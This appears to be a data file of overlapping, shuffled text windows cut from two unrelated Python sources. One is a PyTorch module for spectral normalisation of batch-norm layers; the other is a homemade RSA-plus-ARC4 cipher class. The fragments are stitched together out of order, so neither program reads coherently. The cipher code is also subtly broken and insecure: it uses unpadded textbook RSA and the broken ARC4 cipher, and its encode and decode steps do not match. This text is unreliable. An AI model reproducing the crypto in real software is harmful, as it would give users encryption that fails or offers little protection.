"spectral norm :math:`\\sigma` of the weight matrix calculated using power iteration method. If",
"and also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn)",
"delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still",
"batch normalization layers to be of Lipschtz constant sigma (default=1.0). \"\"\" import torch",
"to assign weight back as fn.name because all sorts of # things may",
"a hook that calculates spectral norm and rescales weight before every :meth:`~Module.forward` call.",
"name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps = eps def",
"BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of",
"def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name]",
"torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name,",
"remove(self, module): weight = getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module,",
"sorts of # things may assume that it exists, e.g., when initializing weights.",
"is reshaped to 2D in power iteration method to get spectral norm. This",
"# and also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data)",
"inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias)",
"sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization from",
"spectral norm and rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization for",
"name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not found in",
"__init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps = eps",
"Adversarial Networks`_ . .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module",
"method. If the dimension of the weight tensor is greater than 2, it",
"(GANs) by rescaling the weight tensor with spectral norm :math:`\\sigma` of the weight",
"bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module,",
"module (nn.Module): containing module name (str, optional): name of weight parameter eps (float,",
"when initializing weights. # However, we can't directly assign as it could be",
"assign weight back as fn.name because all sorts of # things may assume",
"of weight parameter eps (float, optional): epsilon for numerical stability in calculating norms",
"Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma =",
"Instead, we register weight.data as a # buffer, which will cause weight to",
"BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps)",
"name (str, optional): name of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10))",
"still need to assign weight back as fn.name because all sorts of #",
"be an nn.Parameter and # gets added as a parameter. Instead, we register",
"weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\",",
"batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma,",
"The original module with the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10))",
"k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del",
"norm and rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative",
"hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not",
"Generative Adversarial Networks`_ . .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args:",
"original module with the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10,",
"getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name,",
">>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\"",
"bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module,",
"self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias = bias / cur_sigma",
"Spectral Normalization borrowed from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be of",
"import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12):",
"hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k]",
"/ cur_sigma bias = bias / cur_sigma return weight, bias def remove(self, module):",
"import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma",
"dict # and also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\",",
"to a parameter in the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\",
"isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm",
"as a parameter. Instead, we register weight.data as a # buffer, which will",
"norm :math:`\\sigma` of the weight matrix calculated using power iteration method. If the",
"setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module,",
"be included in the state dict # and also supports nn.init due to",
"to 2D in power iteration method to get spectral norm. This is implemented",
"module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a",
"that it exists, e.g., when initializing weights. # However, we can't directly assign",
"Spectral normalization stabilizes the training of discriminators (critics) in Generaive Adversarial Networks (GANs)",
"stability in calculating norms Returns: The original module with the spectal norm hook",
".. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W}",
"print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias",
"of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for",
"= spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook,",
"Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str, optional): name of weight",
"\"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0,",
"and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}'",
"bias def remove(self, module): weight = getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module,",
"weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module,",
". .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing",
"spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm)",
"weight.data as a # buffer, which will cause weight to be included in",
"cause weight to be included in the state dict # and also supports",
"+ \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still need to assign weight back",
"(str, optional): name of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>>",
"parameter. Instead, we register weight.data as a # buffer, which will cause weight",
"normalization to a parameter in the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})}",
"If the dimension of the weight tensor is greater than 2, it is",
"running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma)",
"module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\",",
"of the weight tensor is greater than 2, it is reshaped to 2D",
"it is reshaped to 2D in power iteration method to get spectral norm.",
"= getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig')",
"containing module name (str, optional): name of weight parameter Example: >>> m =",
"from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name =",
"hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size()",
"greater than 2, it is reshaped to 2D in power iteration method to",
"Lipschtz constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object):",
"of the weight matrix calculated using power iteration method. If the dimension of",
"it exists, e.g., when initializing weights. # However, we can't directly assign as",
"initializing weights. # However, we can't directly assign as it could be an",
"every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral",
"= BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module,",
"torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module)",
"= batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name,",
"get spectral norm. This is implemented via a hook that calculates spectral norm",
"weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g =",
"epsilon for numerical stability in calculating norms Returns: The original module with the",
"BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization",
"weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g =",
"and # gets added as a parameter. Instead, we register weight.data as a",
":meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral Normalization",
"cur_sigma return weight, bias def remove(self, module): weight = getattr(module, self.name) bias =",
"= module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight)",
"the weight tensor with spectral norm :math:`\\sigma` of the weight matrix calculated using",
"assume that it exists, e.g., when initializing weights. # However, we can't directly",
"self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\")",
"for numerical stability in calculating norms Returns: The original module with the spectal",
"norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>>",
"sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self,",
"the weight matrix calculated using power iteration method. If the dimension of the",
"eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return",
":math:`\\sigma` of the weight matrix calculated using power iteration method. If the dimension",
"by rescaling the weight tensor with spectral norm :math:`\\sigma` of the weight matrix",
"a module. Args: module (nn.Module): containing module name (str, optional): name of weight",
"del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not found in {}\".format( name,",
"weight before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_ .",
"return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter",
"if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else:",
"/ cur_sigma return weight, bias def remove(self, module): weight = getattr(module, self.name) bias",
"weight back as fn.name because all sorts of # things may assume that",
"discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling the weight tensor with",
"hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not found in {}\".format(",
"optional): name of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m)",
"Networks (GANs) by rescaling the weight tensor with spectral norm :math:`\\sigma` of the",
"can't directly assign as it could be an nn.Parameter and # gets added",
"self.name = name self.sigma = sigma self.eps = eps def compute_weight(self, module): weight",
"= bias / cur_sigma return weight, bias def remove(self, module): weight = getattr(module,",
"fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in",
"r\"\"\"Removes the spectral normalization reparameterization from a module. Args: module (nn.Module): containing module",
"before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_ . ..",
"weight matrix calculated using power iteration method. If the dimension of the weight",
"of Lipschtz constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class",
"bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module,",
"(nn.Module): containing module name (str, optional): name of weight parameter eps (float, optional):",
">>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'):",
"torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the",
"weight parameter eps (float, optional): epsilon for numerical stability in calculating norms Returns:",
"= max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias = bias",
"else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g)",
"_`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name",
"# print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma",
"an nn.Parameter and # gets added as a parameter. Instead, we register weight.data",
"\"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name:",
">>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name",
"because all sorts of # things may assume that it exists, e.g., when",
"module. Args: module (nn.Module): containing module name (str, optional): name of weight parameter",
"This is implemented via a hook that calculates spectral norm and rescales weight",
"via a hook that calculates spectral norm and rescales weight before every :meth:`~Module.forward`",
"'_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma =",
"= getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma",
"10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and",
"fn.name because all sorts of # things may assume that it exists, e.g.,",
"we can't directly assign as it could be an nn.Parameter and # gets",
"name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias =",
"self.eps = eps def compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias",
"torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight =",
"matrix calculated using power iteration method. If the dimension of the weight tensor",
"name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization",
"2D in power iteration method to get spectral norm. This is implemented via",
"weight) module.register_parameter(\"bias_orig\", bias) # We still need to assign weight back as fn.name",
"\\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral",
"r\"\"\"Applies spectral normalization to a parameter in the given module. .. math:: \\mathbf{W}",
"we register weight.data as a # buffer, which will cause weight to be",
"Networks`_ . .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module):",
"eps=1e-12): self.name = name self.sigma = sigma self.eps = eps def compute_weight(self, module):",
"implemented via a hook that calculates spectral norm and rescales weight before every",
"cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias =",
"Generaive Adversarial Networks (GANs) by rescaling the weight tensor with spectral norm :math:`\\sigma`",
"Args: module (nn.Module): containing module name (str, optional): name of weight parameter eps",
"constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def",
"bias / cur_sigma return weight, bias def remove(self, module): weight = getattr(module, self.name)",
"normalization stabilizes the training of discriminators (critics) in Generaive Adversarial Networks (GANs) by",
"numerical stability in calculating norms Returns: The original module with the spectal norm",
"assign as it could be an nn.Parameter and # gets added as a",
"sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in the given module. ..",
"from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be of Lipschtz constant sigma"
] |
[
"* i + 1 if(c % a == 0): c = c//a break",
"return a * b // gcd(a, b) def imod(a, n): i = 1",
"params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message =",
"from rsa import prime from arc4 import ARC4 def gcd(a, b): while b",
"= params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k",
"def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key,",
"return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e'])",
"- 1) self.e = 65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p,",
"p, q, N, phi, e, d): self.p = p self.q = q self.N",
"p self.q = q self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q",
"self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey)",
"b = b, a % b return a def lcm(a, b): return a",
"= imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def",
"% a == 0): c = c//a break i = i+1 return c",
"__init__(self, bit_length=256): p, q = 0, 0 while p == q: p =",
"= phi self.e = e self.d = d def get_pub(self): return (self.N, self.e)",
"lcm(self.p - 1, self.q - 1) self.e = 65537 self.d = imod(self.e, self.phi)",
"return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q = params['q']",
"(self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode()))",
"def encrypt(self, m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m,",
"= token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey,",
"cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if __name__ == \"__main__\":",
"return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p, q, N, phi,",
"q self.N = N self.phi = phi self.e = e self.d = d",
"= prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q = q self.N =",
"= i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message)",
"arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def",
"cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self,",
"0): c = c//a break i = i+1 return c def arc4_encrypt(key, message):",
"def gcd(a, b): while b != 0: a, b = b, a %",
"c = n * i + 1 if(c % a == 0): c",
"self.p = p self.q = q self.N = N self.phi = phi self.e",
"message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key,",
"b != 0: a, b = b, a % b return a def",
"self.N = N self.phi = phi self.e = e self.d = d def",
"def __init__(self, bit_length=256): p, q = 0, 0 while p == q: p",
"def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int):",
"c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def",
"b): return a * b // gcd(a, b) def imod(a, n): i =",
"int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res =",
"decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def",
"break i = i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher",
"= self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if",
"return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher",
"= arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher)",
"plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p, q =",
"self.q - 1) self.e = 65537 self.d = imod(self.e, self.phi) def dump(self): return",
"message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10)",
"self.q = q self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q -",
"65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e,",
"== 0): c = c//a break i = i+1 return c def arc4_encrypt(key,",
"get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey):",
"a * b // gcd(a, b) def imod(a, n): i = 1 while",
"ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain",
"params['p'] self.q = params['q'] self.N = params['N'] self.phi = params['phi'] self.e = params['e']",
"self.p = p self.q = q self.N = self.p*self.q self.phi = lcm(self.p -",
"prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q = q self.N = self.p*self.q",
"= 65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi,",
"= ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p,",
"binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q = params['q'] self.N",
"prime from arc4 import ARC4 def gcd(a, b): while b != 0: a,",
"= c//a break i = i+1 return c def arc4_encrypt(key, message): arc4 =",
"rsa import prime from arc4 import ARC4 def gcd(a, b): while b !=",
"(self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if not",
"params): self.p = params['p'] self.q = params['q'] self.N = params['N'] self.phi = params['phi']",
"return plain class SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0 while",
"class SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0 while p ==",
"p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q = q self.N",
"pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res))",
"return (self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if",
"secrets import token_hex from rsa import prime from arc4 import ARC4 def gcd(a,",
"= p self.q = q self.N = N self.phi = phi self.e =",
"+ 1 if(c % a == 0): c = c//a break i =",
"get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int): m",
"i = i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher =",
"other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA):",
"// gcd(a, b) def imod(a, n): i = 1 while True: c =",
"params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k =",
"tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self,",
"* b // gcd(a, b) def imod(a, n): i = 1 while True:",
"b) def imod(a, n): i = 1 while True: c = n *",
"ARC4 def gcd(a, b): while b != 0: a, b = b, a",
"q = 0, 0 while p == q: p = prime.getprime(bit_length) q =",
"import time import base64 import binascii from secrets import token_hex from rsa import",
"decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self,",
"other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return",
"def __init__(self, params): self.p = params['p'] self.q = params['q'] self.N = params['N'] self.phi",
"arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return",
"class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q = params['q'] self.N =",
"= params['p'] self.q = params['q'] self.N = params['N'] self.phi = params['phi'] self.e =",
"q self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q - 1) self.e",
"1 if(c % a == 0): c = c//a break i = i+1",
"= pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p =",
"int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N)",
"m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c,",
"not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c):",
"= params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message",
"self.q = q self.N = N self.phi = phi self.e = e self.d",
"self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q =",
"pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p']",
"import ARC4 def gcd(a, b): while b != 0: a, b = b,",
"params['N'] self.phi = params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey,",
"= p self.q = q self.N = self.p*self.q self.phi = lcm(self.p - 1,",
"= 1 while True: c = n * i + 1 if(c %",
"other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class",
"self.q, self.N, self.phi, self.e, self.d) def load(self, p, q, N, phi, e, d):",
"self.phi = phi self.e = e self.d = d def get_pub(self): return (self.N,",
"= n * i + 1 if(c % a == 0): c =",
"message) return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'],",
"self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q",
"def imod(a, n): i = 1 while True: c = n * i",
"def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p, q,",
"cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain =",
"encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey,",
"k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message):",
"= self.p*self.q self.phi = lcm(self.p - 1, self.q - 1) self.e = 65537",
"= q self.N = N self.phi = phi self.e = e self.d =",
"def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA:",
"1, self.q - 1) self.e = 65537 self.d = imod(self.e, self.phi) def dump(self):",
"cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class",
"self.N, self.phi, self.e, self.d) def load(self, p, q, N, phi, e, d): self.p",
"res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p",
"arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0",
"return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N) return",
"self.d = d def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d)",
"imod(a, n): i = 1 while True: c = n * i +",
"Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q = params['q'] self.N = params['N']",
"phi self.e = e self.d = d def get_pub(self): return (self.N, self.e) def",
"__init__(self, params): self.p = params['p'] self.q = params['q'] self.N = params['N'] self.phi =",
